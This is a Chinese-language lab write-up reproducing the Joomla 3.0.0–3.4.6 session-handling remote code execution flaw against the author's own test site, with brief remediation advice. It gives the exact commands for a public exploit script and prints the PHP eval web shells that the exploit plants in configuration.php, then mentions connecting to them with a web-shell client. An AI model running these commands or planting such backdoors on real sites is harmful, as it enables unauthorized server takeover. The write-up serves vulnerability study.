0x00 CMS簡介
Joomla!是一套全球知名的內容管理系統。 Joomla!是使用PHP語言加上MySQL數據庫所開發的軟件系統,目前最新版本是3.9.11 。可以在Linux、 Windows、MacOSX等各種不同的平台上執行。目前是由Open Source Matter這個開放源碼組織進行開發與支持,這個組織的成員來自全世界各地,小組成員約有150人,包含了開發者、設計者、系統管理者、文件撰寫者,以及超過2萬名的參與會員。
自2012年頒獎典禮開始以來,Joomla連續多年成為CMS評獎的冠軍。繼2015、2016、2017、2018年在全球CMS評測中,它再次獲得“最佳開源CMS”獎!
0x01 漏洞簡介
- Alessandro Groppo @Hacktive Security於2019-10-02在exploit-db( https://www.exploit-db.com/exploits/47465)發布了Joomla命令執行的EXP,漏洞本質是Joomla對session數據處理不當,未經授權的攻擊者可以發送精心構造的惡意 HTTP 請求,獲取服務器權限,實現遠程命令執行。
- 影響范圍:3.0.0 <= Joomla <= 3.4.6
0x02 環境搭建
我用的phpstudy搭建的
Joomla下載地址:https://downloads.joomla.org/it/cms/joomla3/3-4-6
安裝成功后首頁如下
0x03 漏洞復現
EXP:https://github.com/kiks7/rusty_joomla_rce
1.漏洞檢測
python rusty_joomla_exploit.py -t http://quan.joomla346.net/ -c
運行結果如下,Vulnerable證明存在漏洞
2.漏洞利用
rusty_joomla_rce-master>python rusty_joomla_exploit.py -t http://quan.joomla346.net/ -e -l quan.joomla346.net -p 80
可以看到configuration.php中寫入了一句話木馬(這里我多運行了幾次,於是有好幾個)
if(isset($_POST['epgijbodvzllittceoyidpbbglcdawduhyvqqtdndfxjfivvkg'])) eval($_POST['epgijbodvzllittceoyidpbbglcdawduhyvqqtdndfxjfivvkg']);if(isset($_POST['bhjhofjrtfrlskgaufapblryaqymfzrrbaoluyljwgekkoakhm'])) eval($_POST['bhjhofjrtfrlskgaufapblryaqymfzrrbaoluyljwgekkoakhm']);if(isset($_POST['dzyxxxhejymxvidysrisgguzvbehpuudwgkwcgldarnnlkxgbj'])) eval($_POST['dzyxxxhejymxvidysrisgguzvbehpuudwgkwcgldarnnlkxgbj']);
用菜刀連接
0x04 漏洞修復
更新至官網最新版本